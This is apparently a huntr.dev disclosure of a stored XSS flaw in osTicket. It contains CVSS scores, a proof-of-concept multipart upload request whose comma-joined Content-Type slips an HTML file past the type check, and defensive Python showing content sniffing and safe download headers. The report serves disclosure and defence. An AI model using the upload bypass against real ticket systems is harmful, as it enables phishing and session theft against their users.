huntr / theworstcomrade / C2BB34AC-452D-4624-A1B9-C5B54F52F0CD
History: Oct 18, 2021 - 8:47 p.m.

Cross-site Scripting (XSS) - Stored in osticket/osticket

2021-10-18 20:47:48
theworstcomrade
www.huntr.dev

CVSS3: 6.1 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVSS2: 5.8 Medium
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: NONE
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:N

EPSS: 0.001 Low
Percentile: 32.4%

Description

As its GitHub profile states, osTicket is a widely-used open source support ticket system. During source code research I found that the uploaded-file type check relies on a value controlled by the user (the client-supplied Content-Type of the multipart part), so an unauthenticated user can upload a malicious HTML/JS file as a ticket attachment.

From OWASP: Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

Proof of Concept

POST /ajax.php/draft/ticket.client.jfi710uc6f1h/attach HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------124988469840978117853377254190
Content-Length: 6456
Origin: http://172.17.0.1:8888
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/open.php
Cookie: OSTSESSID=2h2moaijbnk5nojfi710uc6f1h

-----------------------------124988469840978117853377254190
Content-Disposition: form-data; name="file[]"; filename="osticket-phish.html"
Content-Type: image/png,text/html

<html>
<img src>
</html>

-----------------------------124988469840978117853377254190--


PoC Video

https://www.youtube.com/watch?v=iasn6dEDnCw

Impact

From OWASP: An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site.

In this case the generated local link is valid for a few hours and is visible to the issue author and administrators.
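The PoC's comma-joined Content-Type ("image/png,text/html") suggests a check that matches on the client-supplied header. The following is an added example, not osTicket's code: it contrasts that weak pattern with a check that derives the type from the file's own bytes, rejects active content, and serves attachments with headers that stop a browser rendering them. The magic-byte table and helper names are constructed for this example.

```python
import re
from typing import Optional, Tuple

# Allowlisted attachment types keyed by their leading magic bytes (constructed list).
MAGIC_BYTES = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
    b"%PDF-": "application/pdf",
}

# Types a browser may execute as a page or script: never stored or served inline.
ACTIVE_CONTENT = {"text/html", "application/xhtml+xml", "image/svg+xml",
                  "text/javascript", "application/javascript"}

_HTML_HINT = re.compile(rb"<\s*(html|script|img|svg|body|iframe)\b", re.I)


def sniff_type(data: bytes) -> Optional[str]:
    """Derive a type from the file's own content; client headers are ignored here."""
    for magic, mime in MAGIC_BYTES.items():
        if data.startswith(magic):
            return mime
    if _HTML_HINT.search(data[:1024]):
        return "text/html"
    return None


def weak_check(client_content_type: str) -> bool:
    """The pattern the PoC bypasses (hypothetical): the header only has to
    *contain* an allowed type, so 'image/png,text/html' is accepted."""
    return any(mime in client_content_type for mime in MAGIC_BYTES.values())


def validate_upload(client_content_type: str, data: bytes) -> Tuple[bool, str]:
    """Hardened check. Returns (accepted, stored_type_or_reason)."""
    sniffed = sniff_type(data)
    if sniffed is None:
        return False, "unrecognised file content"
    if sniffed in ACTIVE_CONTENT:
        return False, f"active content ({sniffed}) is not an allowed attachment"
    # The declared header is compared whole; a comma-joined value never matches.
    if client_content_type.strip().lower() != sniffed:
        return False, f"declared type {client_content_type!r} does not match content {sniffed!r}"
    return True, sniffed


def safe_download_headers(stored_type: str, filename: str) -> dict:
    """Serve attachments so the browser downloads them rather than rendering them."""
    safe_name = re.sub(r"[^\w.\-]", "_", filename)
    return {"Content-Type": stored_type,
            "Content-Disposition": f'attachment; filename="{safe_name}"',
            "X-Content-Type-Options": "nosniff",
            "Content-Security-Policy": "default-src 'none'; sandbox"}
```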
